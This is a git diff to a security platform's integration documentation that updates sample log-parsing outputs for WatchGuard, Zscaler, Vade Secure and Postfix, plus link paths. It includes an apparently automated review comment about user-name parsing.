@@ -1248,6 +1248,57 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "user_login.json" + + ```json + + { + "message": "1.0|WatchGuard|XTM|12.10.3.B694994|3E000002|host_name=Member2#011serial=AAAAAAAAAAAAA#011msg=SSL VPN user john.doe@example.org@radius from 1.2.3.4 logged in assigned virtual IP is 4.3.2.1", + "event": { + "category": [ + "session" + ], + "code": "3E000002", + "reason": "SSL VPN user john.doe@example.org@radius from 1.2.3.4 logged in assigned virtual IP is 4.3.2.1", + "type": [ + "start" + ] + }, + "observer": { + "product": "XTM", + "serial_number": "AAAAAAAAAAAAA", + "type": "firewall", + "vendor": "WatchGuard", + "version": "12.10.3.B694994" + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "john.doe" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "user": { + "name": "john.doe" + }, + "watchguard": { + "firebox": { + "dhcp": { + "operation": "none" + }, + "virtual_ip": "4.3.2.1" + } + } + } + + ``` + + === "user_login_rejected.json" ```json diff --git a/_shared_content/operations_center/integrations/generated/d719e8b5-85a1-4dad-bf71-46155af56570_sample.md b/_shared_content/operations_center/integrations/generated/d719e8b5-85a1-4dad-bf71-46155af56570_sample.md index e19543e178..41486c9bfa 100644 --- a/_shared_content/operations_center/integrations/generated/d719e8b5-85a1-4dad-bf71-46155af56570_sample.md +++ b/_shared_content/operations_center/integrations/generated/d719e8b5-85a1-4dad-bf71-46155af56570_sample.md @@ -140,6 +140,14 @@ In this section, you will find examples of raw logs as generated natively by the +=== "user_login" + + ``` + 1.0|WatchGuard|XTM|12.10.3.B694994|3E000002|host_name=Member2#011serial=AAAAAAAAAAAAA#011msg=SSL VPN user john.doe@example.org@radius from 1.2.3.4 logged in assigned virtual IP is 4.3.2.1 + ``` + + + === "user_login_rejected" ``` 
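Review bot: in `user_login.json` the raw message names the principal `john.doe@example.org@radius`, but the transformed event keeps only `user.name: "john.doe"` and `related.user: ["john.doe"]`; both the domain (`example.org`) and the authentication-server suffix (`radius`) are dropped. The same local name can exist in several authentication domains on a Firebox, so cutting at the first `@` merges distinct identities; suggest populating `user.domain` with `example.org` and keeping the auth server (for instance under `watchguard.firebox`) so a VPN-login rule can tell RADIUS users from local ones. Separately, `watchguard.firebox.dhcp.operation: "none"` looks like a parser default leaking into a non-DHCP event and could be omitted when the message carries no DHCP information.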
diff --git a/_shared_content/operations_center/integrations/generated/d9f337a4-1303-47d4-b15f-1f83807ff3cc.md b/_shared_content/operations_center/integrations/generated/d9f337a4-1303-47d4-b15f-1f83807ff3cc.md index f124bd13e9..7449005ee9 100644 --- a/_shared_content/operations_center/integrations/generated/d9f337a4-1303-47d4-b15f-1f83807ff3cc.md +++ b/_shared_content/operations_center/integrations/generated/d9f337a4-1303-47d4-b15f-1f83807ff3cc.md @@ -26,7 +26,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "access.json" diff --git a/_shared_content/operations_center/integrations/generated/da3555f9-8213-41b8-8659-4cb814431e29.md b/_shared_content/operations_center/integrations/generated/da3555f9-8213-41b8-8659-4cb814431e29.md index 8ff32cd812..dc4276507d 100644 --- a/_shared_content/operations_center/integrations/generated/da3555f9-8213-41b8-8659-4cb814431e29.md 
+++ b/_shared_content/operations_center/integrations/generated/da3555f9-8213-41b8-8659-4cb814431e29.md @@ -27,7 +27,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "input.json" diff --git a/_shared_content/operations_center/integrations/generated/dbebefdd-dd2e-48a9-89e6-ee5a00ee0956.md b/_shared_content/operations_center/integrations/generated/dbebefdd-dd2e-48a9-89e6-ee5a00ee0956.md index 6e41e12e5d..cff8f2639e 100644 --- a/_shared_content/operations_center/integrations/generated/dbebefdd-dd2e-48a9-89e6-ee5a00ee0956.md +++ b/_shared_content/operations_center/integrations/generated/dbebefdd-dd2e-48a9-89e6-ee5a00ee0956.md 
@@ -20,7 +20,7 @@ The following table lists the data source offered by this integration. ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "event_01.json" diff --git a/_shared_content/operations_center/integrations/generated/dc0f339f-5dbe-4e68-9fa0-c63661820941.md b/_shared_content/operations_center/integrations/generated/dc0f339f-5dbe-4e68-9fa0-c63661820941.md index 7f75124581..e6b479b737 100644 --- a/_shared_content/operations_center/integrations/generated/dc0f339f-5dbe-4e68-9fa0-c63661820941.md +++ b/_shared_content/operations_center/integrations/generated/dc0f339f-5dbe-4e68-9fa0-c63661820941.md 
@@ -27,7 +27,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_event_audit1.json" @@ -194,6 +194,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "ip": [ "1.2.3.4", "5.6.7.8" + ], + "user": [ + "johndoe" ] }, "source": { @@ -201,15 +204,13 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "ip": "1.2.3.4" }, "user": { - "email": "john.doe@example.orf" + "email": "john.doe@example.orf", + "name": "johndoe" }, "zscaler": { "zia": { "category": "Corporate Marketing", "department": "Financial%20Dept", - "device": { - "owner": "johndoe" - }, "source_type": "zscalernss-dns" } } @@ -252,6 +253,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "ip": [ "1.2.3.4", "5.6.7.8" + ], + "user": [ + "johndoe" ] }, "source": { 
@@ -261,15 +265,13 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "port": 52352 }, "user": { - "email": "john.doe@example.org" + "email": "john.doe@example.org", + "name": "johndoe" }, "zscaler": { "zia": { "avgduration": "170000", "department": "Financial%20Dept", - "device": { - "owner": "johndoe" - }, "source_type": "zscalernss-fw", "threat": { "category": "Threat category 2", @@ -331,6 +333,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "ip": [ "1.2.3.4", "5.6.7.8" + ], + "user": [ + "johndoe" ] }, "server": { @@ -342,12 +347,12 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "url": { "domain": "a.et.nytimes.com", - "registered_domain": "nytimes.com", - "subdomain": "a.et", - "top_level_domain": "com" + "original": "a.et.nytimes.com", + "path": "a.et.nytimes.com" }, "user": { - "email": "john.doe@example.org" + "email": "john.doe@example.org", + "name": "johndoe" }, "user_agent": { "device": { @@ -363,9 +368,6 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "zia": { "appname": "General Browsing", "department": "Financial%20Dept", - "device": { - "owner": "johndoe" - }, "event_id": "1111111111111111111", "keyprotectiontype": "N/A", "product": "NSS", @@ -432,6 +434,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "ip": [ "1.2.3.4", "5.6.7.8" + ], + "user": [ + "johndoe" ] }, "server": { 
@@ -443,14 +448,13 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "url": { "domain": "ctldl.windowsupdate.com", + "original": "ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/pinrulesstl.cab?9ea4b61fd3501b07", "path": "msdownload/update/v3/static/trustedr/en/pinrulesstl.cab", - "query": "9ea4b61fd3501b07", - "registered_domain": "windowsupdate.com", - "subdomain": "ctldl", - "top_level_domain": "com" + "query": "9ea4b61fd3501b07" }, "user": { - "email": "john.doe@example.org" + "email": "john.doe@example.org", + "name": "johndoe" }, "user_agent": { "device": { @@ -466,9 +470,6 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "zia": { "appname": "General Browsing", "department": "Financial%20Dept", - "device": { - "owner": "johndoe" - }, "event_id": "1111111111111111111", "keyprotectiontype": "N/A", "product": "NSS", @@ -755,13 +756,13 @@ The following table lists the fields that are extracted, normalized under the EC |`url.path` | `wildcard` | Path of the request, such as "/search". | |`url.query` | `keyword` | Query string of the request. | |`user.email` | `keyword` | User email address. | +|`user.name` | `keyword` | Short name or login of the user. | |`user_agent.original` | `keyword` | Unparsed user_agent string. | |`zscaler.zia.appname` | `keyword` | ZScaler app name | |`zscaler.zia.audit.log_type` | `keyword` | ZScaler audit log type | |`zscaler.zia.avgduration` | `keyword` | ZScaler average duration | |`zscaler.zia.category` | `keyword` | ZScaler category | |`zscaler.zia.department` | `keyword` | ZScaler department | -|`zscaler.zia.device.owner` | `keyword` | ZScaler device owner | |`zscaler.zia.event.outcome` | `keyword` | ZScaler event outcome | |`zscaler.zia.event_id` | `keyword` | ZScaler event ID | |`zscaler.zia.keyprotectiontype` | `keyword` | ZScaler key protection type | 
diff --git a/_shared_content/operations_center/integrations/generated/dcb14795-a6f0-4ebb-a73d-6eb8b982afcd.md b/_shared_content/operations_center/integrations/generated/dcb14795-a6f0-4ebb-a73d-6eb8b982afcd.md index 5d5d57382c..59692757f7 100644 --- a/_shared_content/operations_center/integrations/generated/dcb14795-a6f0-4ebb-a73d-6eb8b982afcd.md +++ b/_shared_content/operations_center/integrations/generated/dcb14795-a6f0-4ebb-a73d-6eb8b982afcd.md @@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "connexion1.json" diff --git a/_shared_content/operations_center/integrations/generated/de9ca004-991e-4f5c-89c5-e075f3fb3216.md b/_shared_content/operations_center/integrations/generated/de9ca004-991e-4f5c-89c5-e075f3fb3216.md index 2eb1c45e18..715bd4f742 100644 --- a/_shared_content/operations_center/integrations/generated/de9ca004-991e-4f5c-89c5-e075f3fb3216.md 
+++ b/_shared_content/operations_center/integrations/generated/de9ca004-991e-4f5c-89c5-e075f3fb3216.md @@ -29,7 +29,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_audit_log_deleted_inline_policy.json" diff --git a/_shared_content/operations_center/integrations/generated/e0eaf2f1-02d0-4d1a-be89-f2b8be4baf4e.md b/_shared_content/operations_center/integrations/generated/e0eaf2f1-02d0-4d1a-be89-f2b8be4baf4e.md index c117e23209..07ea0bc3be 100644 --- a/_shared_content/operations_center/integrations/generated/e0eaf2f1-02d0-4d1a-be89-f2b8be4baf4e.md +++ b/_shared_content/operations_center/integrations/generated/e0eaf2f1-02d0-4d1a-be89-f2b8be4baf4e.md 
@@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_maillog.json" diff --git a/_shared_content/operations_center/integrations/generated/e30f7bcc-7c55-4666-9d32-61a0aa75a2c3.md b/_shared_content/operations_center/integrations/generated/e30f7bcc-7c55-4666-9d32-61a0aa75a2c3.md index c41489f627..c125e71488 100644 --- a/_shared_content/operations_center/integrations/generated/e30f7bcc-7c55-4666-9d32-61a0aa75a2c3.md +++ b/_shared_content/operations_center/integrations/generated/e30f7bcc-7c55-4666-9d32-61a0aa75a2c3.md 
@@ -19,7 +19,7 @@ The following table lists the data source offered by this integration. ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "match_threats.json" diff --git a/_shared_content/operations_center/integrations/generated/e4a758fc-7620-49e6-b8ed-b7fb3d7fa232.md b/_shared_content/operations_center/integrations/generated/e4a758fc-7620-49e6-b8ed-b7fb3d7fa232.md index f0807479a9..6df3aa073d 100644 --- a/_shared_content/operations_center/integrations/generated/e4a758fc-7620-49e6-b8ed-b7fb3d7fa232.md +++ b/_shared_content/operations_center/integrations/generated/e4a758fc-7620-49e6-b8ed-b7fb3d7fa232.md 
@@ -26,7 +26,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "action_overdict.json" @@ -103,6 +103,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I } ], "from_header": "user user@test.fr", + "last_report_date": "0001-01-01T00:00:00Z", "overdict": "clean", "status": "LOW_SPAM", "to_header": "header stuff", @@ -261,6 +262,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ], "folder": "JunkEmail", "from_header": "Test SEKOIA.IO ", + "last_report_date": "0001-01-01T00:00:00Z", "status": "PHISHING", "to_header": "\"test@vadesecure.com\" ", "whitelist": "false" 
@@ -328,6 +330,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I } ], "from_header": "Test SEKOIA.IO ", + "last_report_date": "0001-01-01T00:00:00Z", "status": "LEGIT", "to_header": "\"test@vadesecure.com\" ", "whitelist": "true" @@ -360,6 +363,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "action": "MOVE" } ], + "actions_labels": [ + "MOVE" + ], "id": "zekfnzejnf576rge8768", "nb_messages_remediated": 1, "nb_messages_remediated_read": 0, @@ -397,6 +403,10 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "action": "FAILED" } ], + "actions_labels": [ + "DELETE", + "FAILED" + ], "id": "zekfnzejnf576rge8768", "nb_messages_remediated": 76, "nb_messages_remediated_read": 0, @@ -430,12 +440,15 @@ The following table lists the fields that are extracted, normalized under the EC |`source.ip` | `ip` | IP address of the source. | |`vadesecure.attachments` | `array` | vadesecure.to_header | |`vadesecure.campaign.actions` | `array` | The actions carried out for the remediation campaign. | +|`vadesecure.campaign.actions_labels` | `keyword` | | |`vadesecure.campaign.id` | `keyword` | The ID of the campaign | |`vadesecure.campaign.nb_messages_remediated` | `long` | The total number of messages involved in the remediation. | |`vadesecure.campaign.nb_messages_remediated_read` | `long` | The number of total read messages involved in the remediation. | |`vadesecure.campaign.nb_messages_remediated_unread` | `long` | The number of total unread messages involved in the remediation. | |`vadesecure.folder` | `keyword` | vadesecure.folder | |`vadesecure.from_header` | `keyword` | vadesecure.from_header | +|`vadesecure.last_report` | `keyword` | | +|`vadesecure.last_report_date` | `datetime` | | |`vadesecure.overdict` | `keyword` | vadesecure.overdict | |`vadesecure.status` | `keyword` | vadesecure.status | |`vadesecure.substatus` | `keyword` | vadesecure.substatus | 
diff --git a/_shared_content/operations_center/integrations/generated/e6bb2404-8fc8-4124-a785-c1276277b5d7.md b/_shared_content/operations_center/integrations/generated/e6bb2404-8fc8-4124-a785-c1276277b5d7.md index 9360948843..8474d24372 100644 --- a/_shared_content/operations_center/integrations/generated/e6bb2404-8fc8-4124-a785-c1276277b5d7.md +++ b/_shared_content/operations_center/integrations/generated/e6bb2404-8fc8-4124-a785-c1276277b5d7.md @@ -26,7 +26,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_auth_via_idp.json" diff --git a/_shared_content/operations_center/integrations/generated/e8ca856f-8a58-490b-bea4-247b12b3d74b.md b/_shared_content/operations_center/integrations/generated/e8ca856f-8a58-490b-bea4-247b12b3d74b.md index 7c5655d9bc..2bfac6d493 100644 
--- a/_shared_content/operations_center/integrations/generated/e8ca856f-8a58-490b-bea4-247b12b3d74b.md +++ b/_shared_content/operations_center/integrations/generated/e8ca856f-8a58-490b-bea4-247b12b3d74b.md @@ -26,7 +26,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "client_connection_0.json" diff --git a/_shared_content/operations_center/integrations/generated/e8cb3372-41c8-409f-8e0e-ca4e6cecf7e6.md b/_shared_content/operations_center/integrations/generated/e8cb3372-41c8-409f-8e0e-ca4e6cecf7e6.md index 64a67a23ee..e27924e9d3 100644 --- a/_shared_content/operations_center/integrations/generated/e8cb3372-41c8-409f-8e0e-ca4e6cecf7e6.md +++ b/_shared_content/operations_center/integrations/generated/e8cb3372-41c8-409f-8e0e-ca4e6cecf7e6.md 
@@ -28,7 +28,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "AUD_It.json" diff --git a/_shared_content/operations_center/integrations/generated/eb727929-6a06-4e68-a09d-cf0e5daf3ccd.md b/_shared_content/operations_center/integrations/generated/eb727929-6a06-4e68-a09d-cf0e5daf3ccd.md index 45173c42bc..a13e2b6e93 100644 --- a/_shared_content/operations_center/integrations/generated/eb727929-6a06-4e68-a09d-cf0e5daf3ccd.md +++ b/_shared_content/operations_center/integrations/generated/eb727929-6a06-4e68-a09d-cf0e5daf3ccd.md 
@@ -26,7 +26,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "anvil.json" @@ -701,7 +701,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "email" ], "outcome": "success", - "reason": "Concurrent connections limit exceeded. Visit https://aka.ms/concurrent_sending for more information.", + "reason": "432 4.3.2 Concurrent connections limit exceeded. Visit https://aka.ms/concurrent_sending for more information. [Hostname=P212321.PROD.OUTLOOK.COM] (in reply to end of DATA command)", "type": [ "info" ] 
@@ -746,6 +746,62 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "connection_limited_1.json" + + ```json + + { + "message": "53C2C140E40: host smtp.office365.com[52.97.201.210] said: 432 4.3.2 Concurrent connections limit exceeded. Visit https://aka.ms/concurrent_sending for more information. [Hostname=1111111111111.US0394.PROD.OUTLOOK.COM] (in reply to end of DATA command)", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "reason": "432 4.3.2 Concurrent connections limit exceeded. Visit https://aka.ms/concurrent_sending for more information. [Hostname=1111111111111.US0394.PROD.OUTLOOK.COM] (in reply to end of DATA command)", + "type": [ + "info" + ] + }, + "action": { + "outcome": "success", + "outcome_reason": "The recipient`s Exchange Server incoming mail queue has been stopped", + "target": "network-traffic", + "type": "end of DATA" + }, + "destination": { + "address": "52.97.201.210", + "domain": "smtp.office365.com", + "ip": "52.97.201.210" + }, + "log": { + "syslog": { + "appname": "postfix/smtp" + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "1111111111111.US0394.PROD.OUTLOOK.COM", + "smtp.office365.com" + ], + "ip": [ + "52.97.201.210" + ] + }, + "source": { + "address": "1111111111111.US0394.PROD.OUTLOOK.COM", + "domain": "1111111111111.US0394.PROD.OUTLOOK.COM", + "registered_domain": "OUTLOOK.COM", + "subdomain": "1111111111111.US0394.PROD", + "top_level_domain": "COM" + } + } + + ``` + + === "counter.json" ```json 
@@ -1096,13 +1152,14 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "action": { "name": "sent", "outcome": "success", + "outcome_reason": "success", "target": "network-traffic" }, "destination": { - "address": "example.org", - "domain": "example.org", - "registered_domain": "example.org", - "top_level_domain": "org" + "address": "127.0.0.1", + "domain": "127.0.0.1", + "ip": "127.0.0.1", + "port": 10025 }, "email": { "to": { @@ -1121,7 +1178,10 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "related": { "hosts": [ - "example.org" + "127.0.0.1" + ], + "ip": [ + "127.0.0.1" ] } } 
@@ -1183,6 +1243,118 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "local5.json" + + ```json + + { + "message": "B84078B26C7: to=proxy@example.localdomain, orig_to=sample.orig.to, relay=local, delay=0.05, delays=0.04/0.02/0/0, dsn=2.0.0, status=sent (delivered to mailbox)", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "sent", + "outcome": "success", + "target": "network-traffic" + }, + "destination": { + "address": "example.localdomain", + "domain": "example.localdomain", + "subdomain": "example" + }, + "email": { + "to": { + "address": [ + "proxy@example.localdomain" + ] + } + }, + "log": { + "syslog": { + "appname": "postfix/local" + } + }, + "network": { + "protocol": "smtp" + }, + "postfix": { + "orig_to": "sample.orig.to" + }, + "related": { + "hosts": [ + "example.localdomain" + ] + } + } + + ``` + + +=== "local6.json" + + ```json + + { + "message": "04B953035FC2: to=john.doe@example.org, orig_to=jane.doe@example.com, relay=127.0.0.1:2525, delay=0.44, delays=0.13/0/0.02/0.29, dsn=2.0.0, status=sent (250 Ok)", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "sent", + "outcome": "success", + "target": "network-traffic" + }, + "destination": { + "address": "example.org", + "domain": "example.org", + "ip": "127.0.0.1", + "port": 2525, + "registered_domain": "example.org", + "top_level_domain": "org" + }, + "email": { + "to": { + "address": [ + "john.doe@example.org" + ] + } + }, + "log": { + "syslog": { + "appname": "postfix/local" + } + }, + "network": { + "protocol": "smtp" + }, + "postfix": { + "orig_to": "jane.doe@example.com" + }, + "related": { + "hosts": [ + "example.org" + ], + "ip": [ + "127.0.0.1" + ] + } + } + + ``` + + === "message_id.json" ```json 
@@ -1731,13 +1903,14 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "action": { "name": "sent", "outcome": "success", + "outcome_reason": "success", "target": "network-traffic" }, "destination": { - "address": "example.org", - "domain": "example.org", - "registered_domain": "example.org", - "top_level_domain": "org" + "address": "127.0.0.1", + "domain": "127.0.0.1", + "ip": "127.0.0.1", + "port": 10025 }, "email": { "to": { @@ -1756,7 +1929,10 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "related": { "hosts": [ - "example.org" + "127.0.0.1" + ], + "ip": [ + "127.0.0.1" ] } } @@ -3256,7 +3432,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "email" ], "outcome": "success", - "reason": "Concurrent connections limit exceeded. Visit https://aka.ms/concurrent_sending for more information.", + "reason": "432 4.3.2 Concurrent connections limit exceeded. Visit https://aka.ms/concurrent_sending for more information. [Hostname=EXAMPLE.PROD.OUTLOOK.COM] (in reply to end of DATA command)", "type": [ "info" ] @@ -3480,6 +3656,8 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "destination": { "address": "mail2sms.smsbox.net", "domain": "mail2sms.smsbox.net", + "ip": "127.0.0.1", + "port": 10025, "registered_domain": "smsbox.net", "subdomain": "mail2sms", "top_level_domain": "net" @@ -3502,6 +3680,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "related": { "hosts": [ "mail2sms.smsbox.net" + ], + "ip": [ + 